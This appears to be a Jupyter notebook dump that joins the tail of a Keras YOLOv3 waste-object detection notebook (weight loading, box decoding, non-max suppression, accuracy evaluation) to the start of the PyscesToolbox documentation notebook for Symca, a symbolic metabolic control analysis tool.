78},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 79}], skip=False)\n\t# Layer 80 => 82\n\tyolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},\n\t\t\t\t\t\t\t {'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 81}], skip=False)\n\t# Layer 83 => 86\n\tx = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 84}], skip=False)\n\tx = UpSampling2D(2)(x)\n\tx = concatenate([x, skip_61])\n\t# Layer 87 => 91\n\tx = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 87},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 88},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 89},\n\t\t\t\t\t\t{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 90},\n\t\t\t\t\t\t{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 91}], skip=False)\n\t# Layer 92 => 94\n\tyolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},\n\t\t\t\t\t\t\t {'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 93}], skip=False)\n\t# Layer 95 => 98\n\tx = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 96}], skip=False)\n\tx = UpSampling2D(2)(x)\n\tx = concatenate([x, skip_36])\n\t# Layer 99 => 106\n\tyolo_106 = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 99},\n\t\t\t\t\t\t\t {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 100},\n\t\t\t\t\t\t\t {'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 101},\n\t\t\t\t\t\t\t {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 102},\n\t\t\t\t\t\t\t {'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 103},\n\t\t\t\t\t\t\t {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 104},\n\t\t\t\t\t\t\t {'filter': 54, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'layer_idx': 105}], skip=False)\n\tmodel = Model(input_image, [yolo_82, yolo_94, yolo_106])\n\treturn model", "_____no_output_____" ] ], [ [ "**Read and Load the pre-trained model weight**", "_____no_output_____" ] ], [ [ "class WeightReader:\n\tdef __init__(self, weight_file):\n\t\twith open(weight_file, 'rb') as w_f:\n\t\t\tmajor,\t= struct.unpack('i', w_f.read(4))\n\t\t\tminor,\t= struct.unpack('i', w_f.read(4))\n\t\t\trevision, = struct.unpack('i', w_f.read(4))\n\t\t\tif (major*10 + minor) >= 2 and major < 1000 and minor < 1000:\n\t\t\t\tw_f.read(8)\n\t\t\telse:\n\t\t\t\tw_f.read(4)\n\t\t\ttranspose = (major > 1000) or (minor > 1000)\n\t\t\tbinary = w_f.read()\n\t\tself.offset = 0\n\t\tself.all_weights = np.frombuffer(binary, dtype='float32')\n\n\tdef read_bytes(self, size):\n\t\tself.offset = self.offset + size\n\t\treturn self.all_weights[self.offset-size:self.offset]\n\n\tdef load_weights(self, model):\n\t\tfor i in range(106):\n\t\t\ttry:\n\t\t\t\tconv_layer = model.get_layer('conv_' + str(i))\n\t\t\t\tprint(\"loading weights of convolution #\" + str(i))\n\t\t\t\tif i not in [81, 93, 105]:\n\t\t\t\t\tnorm_layer = model.get_layer('bnorm_' + str(i))\n\t\t\t\t\tsize = np.prod(norm_layer.get_weights()[0].shape)\n\t\t\t\t\tbeta = self.read_bytes(size) # bias\n\t\t\t\t\tgamma = self.read_bytes(size) # scale\n\t\t\t\t\tmean = self.read_bytes(size) # mean\n\t\t\t\t\tvar = self.read_bytes(size) # variance\n\t\t\t\t\tweights = norm_layer.set_weights([gamma, beta, mean, var])\n\t\t\t\tif len(conv_layer.get_weights()) > 1:\n\t\t\t\t\tbias = self.read_bytes(np.prod(conv_layer.get_weights()[1].shape))\n\t\t\t\t\tkernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n\t\t\t\t\tkernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n\t\t\t\t\tkernel = kernel.transpose([2,3,1,0])\n\t\t\t\t\tconv_layer.set_weights([kernel, bias])\n\t\t\t\telse:\n\t\t\t\t\tkernel = self.read_bytes(np.prod(conv_layer.get_weights()[0].shape))\n\t\t\t\t\tkernel = kernel.reshape(list(reversed(conv_layer.get_weights()[0].shape)))\n\t\t\t\t\tkernel = kernel.transpose([2,3,1,0])\n\t\t\t\t\tconv_layer.set_weights([kernel])\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"no convolution #\" + str(i))\n\n\tdef reset(self):\n\t\tself.offset = 0", "_____no_output_____" ] ], [ [ "**Define the model**", "_____no_output_____" ] ], [ [ "model = make_yolov3_model()", "_____no_output_____" ] ], [ [ "**Call class WeightReader to read the weight & load to the model**", "_____no_output_____" ] ], [ [ "weight_reader = WeightReader(\"/content/drive/MyDrive/yolo_custom_model_Training/backup/test_cfg_20000.weights\")", "_____no_output_____" ], [ "weight_reader.load_weights(model)", "loading weights of convolution #0\nloading weights of convolution #1\nloading weights of convolution #2\nloading weights of convolution #3\nno convolution #4\nloading weights of convolution #5\nloading weights of convolution #6\nloading weights of convolution #7\nno convolution #8\nloading weights of convolution #9\nloading weights of convolution #10\nno convolution #11\nloading weights of convolution #12\nloading weights of convolution #13\nloading weights of convolution #14\nno convolution #15\nloading weights of convolution #16\nloading weights of convolution #17\nno convolution #18\nloading weights of convolution #19\nloading weights of convolution #20\nno convolution #21\nloading weights of convolution #22\nloading weights of convolution #23\nno convolution #24\nloading weights of convolution #25\nloading weights of convolution #26\nno convolution #27\nloading weights of convolution #28\nloading weights of convolution #29\nno convolution #30\nloading weights of convolution #31\nloading weights of convolution #32\nno convolution #33\nloading weights of convolution #34\nloading weights of convolution #35\nno convolution #36\nloading weights of convolution #37\nloading weights of convolution #38\nloading weights of convolution #39\nno convolution #40\nloading weights of convolution #41\nloading weights of convolution #42\nno convolution #43\nloading weights of convolution #44\nloading weights of convolution #45\nno convolution #46\nloading weights of convolution #47\nloading weights of convolution #48\nno convolution #49\nloading weights of convolution #50\nloading weights of convolution #51\nno convolution #52\nloading weights of convolution #53\nloading weights of convolution #54\nno convolution #55\nloading weights of convolution #56\nloading weights of convolution #57\nno convolution #58\nloading weights of convolution #59\nloading weights of convolution #60\nno convolution #61\nloading weights of convolution #62\nloading weights of convolution #63\nloading weights of convolution #64\nno convolution #65\nloading weights of convolution #66\nloading weights of convolution #67\nno convolution #68\nloading weights of convolution #69\nloading weights of convolution #70\nno convolution #71\nloading weights of convolution #72\nloading weights of convolution #73\nno convolution #74\nloading weights of convolution #75\nloading weights of convolution #76\nloading weights of convolution #77\nloading weights of convolution #78\nloading weights of convolution #79\nloading weights of convolution #80\nloading weights of convolution #81\nno convolution #82\nno convolution #83\nloading weights of convolution #84\nno convolution #85\nno convolution #86\nloading weights of convolution #87\nloading weights of convolution #88\nloading weights of convolution #89\nloading weights of convolution #90\nloading weights of convolution #91\nloading weights of convolution #92\nloading weights of convolution #93\nno convolution #94\nno convolution #95\nloading weights of convolution #96\nno convolution #97\nno convolution #98\nloading weights of convolution #99\nloading weights of convolution #100\nloading weights of convolution #101\nloading weights of convolution #102\nloading weights of convolution #103\nloading weights of convolution #104\nloading weights of convolution #105\n" ] ], [ [ "**We will use a pre-trained model to perform object detection**", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom matplotlib import pyplot \nfrom matplotlib.patches import Rectangle\nfrom numpy import expand_dims\nfrom keras.models import load_model\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\n\n\n# define the expected input shape for the model\ninput_w, input_h = 416, 416", "_____no_output_____" ] ], [ [ "**Draw bounding box on the images**", "_____no_output_____" ] ], [ [ "class BoundBox:\n\tdef __init__(self, xmin, ymin, xmax, ymax, objness = None, classes = None):\n\t\tself.xmin = xmin\n\t\tself.ymin = ymin\n\t\tself.xmax = xmax\n\t\tself.ymax = ymax\n\t\tself.objness = objness\n\t\tself.classes = classes\n\t\tself.label = -1\n\t\tself.score = -1\n\n\tdef get_label(self):\n\t\tif self.label == -1:\n\t\t\tself.label = np.argmax(self.classes)\n\n\t\treturn self.label\n\n\tdef get_score(self):\n\t\tif self.score == -1:\n\t\t\tself.score = self.classes[self.get_label()]\n\n\t\treturn self.score\n\n\ndef _sigmoid(x):\n\treturn 1. / (1. + np.exp(-x))", "_____no_output_____" ], [ "def decode_netout(netout, anchors, obj_thresh, net_h, net_w):\n\tgrid_h, grid_w = netout.shape[:2] # 0 and 1 is row and column 13*13\n\tnb_box = 3 # 3 anchor boxes\n\tnetout = netout.reshape((grid_h, grid_w, nb_box, -1)) #13*13*3 ,-1\n\tnb_class = netout.shape[-1] - 5\n\tboxes = []\n\tnetout[..., :2] = _sigmoid(netout[..., :2])\n\tnetout[..., 4:] = _sigmoid(netout[..., 4:])\n\tnetout[..., 5:] = netout[..., 4][..., np.newaxis] * netout[..., 5:]\n\tnetout[..., 5:] *= netout[..., 5:] > obj_thresh\n\n\tfor i in range(grid_h*grid_w):\n\t\trow = i / grid_w\n\t\tcol = i % grid_w\n\t\tfor b in range(nb_box):\n\t\t\t# 4th element is objectness score\n\t\t\tobjectness = netout[int(row)][int(col)][b][4]\n\t\t\tif(objectness.all() <= obj_thresh): continue\n\t\t\t# first 4 elements are x, y, w, and h\n\t\t\tx, y, w, h = netout[int(row)][int(col)][b][:4]\n\t\t\tx = (col + x) / grid_w # center position, unit: image width\n\t\t\ty = (row + y) / grid_h # center position, unit: image height\n\t\t\tw = anchors[2 * b + 0] * np.exp(w) / net_w # unit: image width\n\t\t\th = anchors[2 * b + 1] * np.exp(h) / net_h # unit: image height\n\t\t\t# last elements are class probabilities\n\t\t\tclasses = netout[int(row)][col][b][5:]\n\t\t\tbox = BoundBox(x-w/2, y-h/2, x+w/2, y+h/2, objectness, classes)\n\t\t\tboxes.append(box)\n\treturn boxes\n\n\ndef correct_yolo_boxes(boxes, image_h, image_w, net_h, net_w):\n\tnew_w, new_h = net_w, net_h\n\tfor i in range(len(boxes)):\n\t\tx_offset, x_scale = (net_w - new_w)/2./net_w, float(new_w)/net_w\n\t\ty_offset, y_scale = (net_h - new_h)/2./net_h, float(new_h)/net_h\n\t\tboxes[i].xmin = int((boxes[i].xmin - x_offset) / x_scale * image_w)\n\t\tboxes[i].xmax = int((boxes[i].xmax - x_offset) / x_scale * image_w)\n\t\tboxes[i].ymin = int((boxes[i].ymin - y_offset) / y_scale * image_h)\n\t\tboxes[i].ymax = int((boxes[i].ymax - y_offset) / y_scale * image_h)", "_____no_output_____" ] ], [ [ "**Intersection over Union - Actual bounding box vs predicted bounding box** ", "_____no_output_____" ] ], [ [ "def _interval_overlap(interval_a, interval_b):\n\tx1, x2 = interval_a\n\tx3, x4 = interval_b\n\tif x3 < x1:\n\t\tif x4 < x1:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn min(x2,x4) - x1\n\telse:\n\t\tif x2 < x3:\n\t\t\t return 0\n\t\telse:\n\t\t\treturn min(x2,x4) - x3\n\n#intersection over union \ndef bbox_iou(box1, box2):\n\tintersect_w = _interval_overlap([box1.xmin, box1.xmax], [box2.xmin, box2.xmax])\n\tintersect_h = _interval_overlap([box1.ymin, box1.ymax], [box2.ymin, box2.ymax])\n\tintersect = intersect_w * intersect_h\n \n \n\tw1, h1 = box1.xmax-box1.xmin, box1.ymax-box1.ymin \n\tw2, h2 = box2.xmax-box2.xmin, box2.ymax-box2.ymin\n \n #Union(A,B) = A + B - Inter(A,B)\n\tunion = w1*h1 + w2*h2 - intersect\n\treturn float(intersect) / union\n", "_____no_output_____" ] ], [ [ "**Non Max Suppression - Only choose the high probability bounding boxes**", "_____no_output_____" ] ], [ [ "#boxes from correct_yolo_boxes and decode_netout\ndef do_nms(boxes, nms_thresh): \n\tif len(boxes) > 0:\n\t\tnb_class = len(boxes[0].classes)\n\telse:\n\t\treturn\n\tfor c in range(nb_class):\n\t\tsorted_indices = np.argsort([-box.classes[c] for box in boxes])\n\t\tfor i in range(len(sorted_indices)):\n\t\t\tindex_i = sorted_indices[i]\n\t\t\tif boxes[index_i].classes[c] == 0: continue\n\t\t\tfor j in range(i+1, len(sorted_indices)):\n\t\t\t\tindex_j = sorted_indices[j]\n\t\t\t\tif bbox_iou(boxes[index_i], boxes[index_j]) >= nms_thresh:\n\t\t\t\t\tboxes[index_j].classes[c] = 0", "_____no_output_____" ] ], [ [ "**Load and Prepare images**", "_____no_output_____" ] ], [ [ "def load_image_pixels(filename, shape):\n\t# load the image to get its shape\n\timage = load_img(filename) #load_img() Keras function to load the image .\n\twidth, height = image.size\n\t# load the image with the required size\n\timage = load_img(filename, target_size=shape) # target_size argument to resize the image after loading\n\t# convert to numpy array\n\timage = img_to_array(image)\n\t# scale pixel values to [0, 1]\n\timage = image.astype('float32')\n\timage /= 255.0 #rescale the pixel values from 0-255 to 0-1 32-bit floating point values.\n\t# add a dimension so that we have one sample\n\timage = expand_dims(image, 0)\n\treturn image, width, height", "_____no_output_____" ] ], [ [ "**Save all of the boxes above the threshold**", "_____no_output_____" ] ], [ [ "def get_boxes(boxes, labels, thresh):\n\tv_boxes, v_labels, v_scores = list(), list(), list()\n\t# enumerate all boxes\n\tfor box in boxes:\n\t\t# enumerate all possible labels\n\t\tfor i in range(len(labels)):\n\t\t\t# check if the threshold for this label is high enough\n\t\t\tif box.classes[i] > thresh:\n\t\t\t\tv_boxes.append(box)\n\t\t\t\tv_labels.append(labels[i])\n\t\t\t\tv_scores.append(box.classes[i]*100)\n\n\treturn v_boxes, v_labels, v_scores", "_____no_output_____" ] ], [ [ "**Draw all the boxes based on the information from the previous step**", "_____no_output_____" ] ], [ [ "def draw_boxes(filename, v_boxes, v_labels, v_scores):\n\t# load the image\n\tdata = pyplot.imread(filename)\n\t# plot the image\n\tpyplot.imshow(data)\n\t# get the context for drawing boxes\n\tax = pyplot.gca()\n\t# plot each box\n\tfor i in range(len(v_boxes)):\n #by retrieving the coordinates from each bounding box and creating a Rectangle object.\n \n\t\tbox = v_boxes[i]\n\t\t# get coordinates\n\t\ty1, x1, y2, x2 = box.ymin, box.xmin, box.ymax, box.xmax\n\t\t# calculate width and height of the box\n\t\twidth, height = x2 - x1, y2 - y1\n\t\t# create the shape\n\t\trect = Rectangle((x1, y1), width, height, fill=False, color='white') \n\t\t# draw the box\n\t\tax.add_patch(rect)\n\t\t# draw text and score in top left corner\n\t\tlabel = \"%s (%.3f)\" % (v_labels[i], v_scores[i])\n\t\tpyplot.text(x1, y1, label, color='white')\n\t# show the plot\n\tpyplot.show()\ndraw_boxes", "_____no_output_____" ] ], [ [ "### **Detection**", "_____no_output_____" ] ], [ [ "%cd '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'\ninput_w, input_h = 416, 416\nanchors = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]] \nclass_threshold = 0.15\npred_right = 0\nlabels = ['clear_plastic_bottle','plastic_bottle_cap','drink_can','plastic_straw','paper_straw',\n'disposable_plastic_cup','styrofoam_piece','glass_bottle','pop_tab','paper_bag','plastic_utensils',\n'normal_paper','plastic_lid']\nfilepath = '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'\n\nfor im in os.listdir(filepath):\n image, image_w, image_h = load_image_pixels(im, (input_w, input_h))\n yhat = model.predict(image)\n boxes = list()\n for i in range(len(yhat)):\n \tboxes += decode_netout(yhat[i][0], anchors[i], class_threshold, input_h, input_w)\n correct_yolo_boxes(boxes, image_h, image_w, input_h, input_w)\n do_nms(boxes, 0.1) \n v_boxes, v_labels, v_scores = get_boxes(boxes, labels, class_threshold)\n\n if len(v_labels)!=0:\n image_name, useless = im.split('.')\n if image_name[:-3] == v_labels[0]:\n pred_right +=1\n\naccuracy = '{:.2%}'.format(pred_right/130)\nprint(\"the detection accuracy is \" + accuracy)\n", "/content/drive/MyDrive/yolo_custom_model_Training/custom_data\nthe detection accuracy is 8.46%\n" ], [ "pred_right", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1fb6551f0fc9501cc379065ba91b048a5b28a1
351,588
ipynb
Jupyter Notebook
documentation/notebooks/Symca.ipynb
PySCeS/PyscesToolbox
f1f7a8b901e3c32023079e0ad3e523dcf866a53c
[ "BSD-3-Clause" ]
3
2017-07-24T16:29:03.000Z
2018-10-04T13:29:24.000Z
documentation/notebooks/Symca.ipynb
PySCeS/PyscesToolbox
f1f7a8b901e3c32023079e0ad3e523dcf866a53c
[ "BSD-3-Clause" ]
3
2015-11-03T09:52:30.000Z
2020-08-21T08:45:33.000Z
documentation/notebooks/Symca.ipynb
PySCeS/PyscesToolbox
f1f7a8b901e3c32023079e0ad3e523dcf866a53c
[ "BSD-3-Clause" ]
2
2016-12-08T07:44:17.000Z
2017-09-19T07:32:45.000Z
171.506341
54,180
0.878639
[ [ [ "################################ NOTES ##############################ex\n# Lines of code that are to be excluded from the documentation are #ex\n# marked with `#ex` at the end of the line. #ex\n# #ex\n# To ensure that figures are displayed correctly together with widgets #ex\n# in the sphinx documentation we will include screenshots of some of #ex\n# the produced figures. #ex\n# Do not run cells with the `display(Image('path_to_image'))` code to #ex\n# avoid duplication of results in the notebook. #ex\n# #ex\n# Some reStructuredText 2 (ReST) syntax is included to aid in #ex\n# conversion to ReST for the sphinx documentation. #ex\n#########################################################################ex\nnotebook_dir = %pwd #ex\nimport pysces #ex\nimport psctb #ex\nimport numpy #ex\nfrom os import path #ex\nfrom IPython.display import display, Image #ex\nfrom sys import platform #ex\n%matplotlib inline ", "_____no_output_____" ] ], [ [ "# Symca\n\nSymca is used to perform symbolic metabolic control analysis [[3,4]](references.html) on metabolic pathway models in order to dissect the control properties of these pathways in terms of the different chains of local effects (or control patterns) that make up the total control coefficient values. Symbolic/algebraic expressions are generated for each control coefficient in a pathway which can be subjected to further analysis.\n\n## Features\n\n* Generates symbolic expressions for each control coefficient of a metabolic pathway model. \n* Splits control coefficients into control patterns that indicate the contribution of different chains of local effects.\n* Control coefficient and control pattern expressions can be manipulated using standard `SymPy` functionality. \n* Values of control coefficient and control pattern values are determined automatically and updated automatically following the calculation of standard (non-symbolic) control coefficient values subsequent to a parameter alteration.\n* Analysis sessions (raw expression data) can be saved to disk for later use. \n* The effect of parameter scans on control coefficient and control patters can be generated and displayed using `ScanFig`.\n* Visualisation of control patterns by using `ModelGraph` functionality.\n* Saving/loading of `Symca` sessions.\n* Saving of control pattern results.\n\n## Usage and feature walkthrough\n\n### Workflow\n\nPerforming symbolic control analysis with `Symca` usually requires the following steps:\n\n1. Instantiation of a `Symca` object using a `PySCeS` model object.\n2. Generation of symbolic control coefficient expressions.\n3. Access generated control coefficient expression results via `cc_results` and the corresponding control coefficient name (see [Basic Usage](basic_usage.ipynb#syntax))\n4. Inspection of control coefficient values.\n5. Inspection of control pattern values and their contributions towards the total control coefficient values. \n6. Inspection of the effect of parameter changes (parameter scans) on the values of control coefficients and control patterns and the contribution of control patterns towards control coefficients.\n7. Session/result saving if required\n8. Further analysis.\n\n### Object instantiation\n\nInstantiation of a `Symca` analysis object requires `PySCeS` model object (`PysMod`) as an argument. Using the included [lin4_fb.psc](included_files.html#lin4-fb-psc) model a `Symca` session is instantiated as follows:\n", "_____no_output_____" ] ], [ [ "mod = pysces.model('lin4_fb')\nsc = psctb.Symca(mod)", "Assuming extension is .psc\nUsing model directory: /home/jr/Pysces/psc\n/home/jr/Pysces/psc/lin4_fb.psc loading ..... \nParsing file: /home/jr/Pysces/psc/lin4_fb.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\n" ] ], [ [ "Additionally `Symca` has the following arguments:\n\n* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*\n* `auto_load`: If `True` `Symca` will try to load a previously saved session. Saved data is unaffected by the `internal_fixed` argument above *(default: `False`)*.", "_____no_output_____" ], [ ".. note:: For the case where an internal metabolite is fixed see [Fixed internal metabolites](Symca.ipynb#fixed-internal-metabolites) below.", "_____no_output_____" ], [ "### Generating symbolic control coefficient expressions\n\nControl coefficient expressions can be generated as soon as a `Symca` object has been instantiated using the `do_symca` method. This process can potentially take quite some time to complete, therefore we recommend saving the generated expressions for later loading (see [Saving/Loading Sessions](Symca.ipynb#saving-loading-sessions) below). In the case of `lin4_fb.psc` expressions should be generated within a few seconds.", "_____no_output_____" ] ], [ [ "sc.do_symca()", "Simplifying matrix with 28 elements\n****************************\n" ] ], [ [ "`do_symca` has the following arguments:\n\n* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*\n* `auto_save_load`: If set to `True` `Symca` will attempt to load a previously saved session and only generate new expressions in case of a failure. After generation of new results, these results will be saved instead. Setting `internal_fixed` to `True` does not affect previously saved results that were generated with this argument set to `False` *(default: `False`)*.", "_____no_output_____" ], [ "### Accessing control coefficient expressions\n\nGenerated results may be accessed via a dictionary-like `cc_results` object (see [Basic Usage - Tables](basic_usage.ipynb#tables)). Inspecting this `cc_results` object in a IPython/Jupyter notebook yields a table of control coefficient values:", "_____no_output_____" ] ], [ [ "sc.cc_results", "_____no_output_____" ] ], [ [ "Inspecting an individual control coefficient yields a symbolic expression together with a value:", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4", "_____no_output_____" ] ], [ [ "In the above example, the expression of the control coefficient consists of two numerator terms and a common denominator shared by all the control coefficient expression signified by $\\Sigma$.", "_____no_output_____" ], [ "Various properties of this control coefficient can be accessed such as the:\n* Expression (as a `SymPy` expression)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.expression", "_____no_output_____" ] ], [ [ "* Numerator expression (as a `SymPy` expression)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.numerator", "_____no_output_____" ] ], [ [ "* Denominator expression (as a `SymPy` expression)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.denominator", "_____no_output_____" ] ], [ [ "* Value (as a `float64`)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.value", "_____no_output_____" ] ], [ [ "Additional, less pertinent, attributes are `abs_value`, `latex_expression`, `latex_expression_full`, `latex_numerator`, `latex_name`, `name` and `denominator_object`.", "_____no_output_____" ], [ "The individual control coefficient numerator terms, otherwise known as control patterns, may also be accessed as follows:", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.CP001", "_____no_output_____" ], [ "sc.cc_results.ccJR1_R4.CP002", "_____no_output_____" ] ], [ [ "Each control pattern is numbered arbitrarily starting from 001 and has similar properties as the control coefficient object (i.e., their expression, numerator, value etc. can also be accessed).\n\n#### Control pattern percentage contribution\n\nAdditionally control patterns have a `percentage` field which indicates the degree to which a particular control pattern contributes towards the overall control coefficient value:", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.CP001.percentage", "_____no_output_____" ], [ "sc.cc_results.ccJR1_R4.CP002.percentage", "_____no_output_____" ] ], [ [ "Unlike conventional percentages, however, these values are calculated as percentage contribution towards the sum of the absolute values of all the control coefficients (rather than as the percentage of the total control coefficient value). This is done to account for situations where control pattern values have different signs.\n\nA particularly problematic example of where the above method is necessary, is a hypothetical control coefficient with a value of zero, but with two control patterns with equal value but opposite signs. In this case a conventional percentage calculation would lead to an undefined (`NaN`) result, whereas our methodology would indicate that each control pattern is equally ($50\\%$) responsible for the observed control coefficient value.", "_____no_output_____" ], [ "### Dynamic value updating\n\nThe values of the control coefficients and their control patterns are automatically updated when new steady-state\nelasticity coefficients are calculated for the model. Thus changing a parameter of `lin4_hill`, such as the $V_{f}$ value of reaction 4, will lead to new control coefficient and control pattern values:", "_____no_output_____" ] ], [ [ "mod.reLoad()\n# mod.Vf_4 has a default value of 50\nmod.Vf_4 = 0.1\n# calculating new steady state\nmod.doMca()", "\nParsing file: /home/jr/Pysces/psc/lin4_fb.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\n" ], [ "# now ccJR1_R4 and its two control patterns should have new values\nsc.cc_results.ccJR1_R4", "_____no_output_____" ], [ "# original value was 0.000\nsc.cc_results.ccJR1_R4.CP001", "_____no_output_____" ], [ "# original value was 0.964\nsc.cc_results.ccJR1_R4.CP002", "_____no_output_____" ], [ "# resetting to default Vf_4 value and recalculating\nmod.reLoad()\nmod.doMca()", "\nParsing file: /home/jr/Pysces/psc/lin4_fb.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\n" ] ], [ [ "### Control pattern graphs\n\nAs described under [Basic Usage](basic_usage.ipynb#graphic-representation-of-metabolic-networks), `Symca` has the functionality to display the chains of local effects represented by control patterns on a scheme of a metabolic model. This functionality can be accessed via the `highlight_patterns` method:", "_____no_output_____" ] ], [ [ "# This path leads to the provided layout file \npath_to_layout = '~/Pysces/psc/lin4_fb.dict'\n\n# Correct path depending on platform - necessary for platform independent scripts\nif platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):\n path_to_layout = psctb.utils.misc.unix_to_windows_path(path_to_layout)\nelse:\n path_to_layout = path.expanduser(path_to_layout)", "_____no_output_____" ], [ "sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)", "Widget Javascript not detected. It may not be installed or enabled properly.\n" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_model_graph_1.png'))) #ex", "_____no_output_____" ] ], [ [ "`highlight_patterns` has the following optional arguments:\n\n* `width`: Sets the width of the graph (*default*: 900).\n* `height`:Sets the height of the graph (*default*: 500).\n* `show_dummy_sinks`: If `True` reactants with the \"dummy\" or \"sink\" will not be displayed (*default*: `False`).\n* `show_external_modifier_links`: If `True` edges representing the interaction of external effectors with reactions will be shown (*default*: `False`).\n\nClicking either of the two buttons representing the control patterns highlights these patterns according according to their percentage contribution (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)) towards the total control coefficient.", "_____no_output_____" ] ], [ [ "# clicking on CP002 shows that this control pattern representing \n# the chain of effects passing through the feedback loop\n# is totally responsible for the observed control coefficient value.\nsc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)", "Widget Javascript not detected. It may not be installed or enabled properly.\n" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_model_graph_2.png'))) #ex", "_____no_output_____" ], [ "# clicking on CP001 shows that this control pattern representing \n# the chain of effects of the main pathway does not contribute\n# at all to the control coefficient value.\nsc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)", "Widget Javascript not detected. It may not be installed or enabled properly.\n" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_model_graph_3.png'))) #ex", "_____no_output_____" ] ], [ [ "### Parameter scans\n\nParameter scans can be performed in order to determine the effect of a parameter change on either the control coefficient and control pattern values or of the effect of a parameter change on the contribution of the control patterns towards the control coefficient (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)). The procedures for both the \"value\" and \"percentage\" scans are very much the same and rely on the same principles as described in the [Basic Usage](basic_usage.ipynb#plotting-and-displaying-results) and [RateChar](RateChar.ipynb#plotting-results) sections.\n\nTo perform a parameter scan the `do_par_scan` method is called. This method has the following arguments:\n\n* `parameter`: A String representing the parameter which should be varied.\n* `scan_range`: Any iterable representing the range of values over which to vary the parameter (typically a NumPy `ndarray` generated by `numpy.linspace` or `numpy.logspace`).\n* `scan_type`: Either `\"percentage\"` or `\"value\"` as described above (*default*: `\"percentage\"`).\n* `init_return`: If `True` the parameter value will be reset to its initial value after performing the parameter scan (*default*: `True`).\n* `par_scan`: If `True`, the parameter scan will be performed by multiple parallel processes rather than a single process, thus speeding performance (*default*: `False`).\n* `par_engine`: Specifies the engine to be used for the parallel scanning 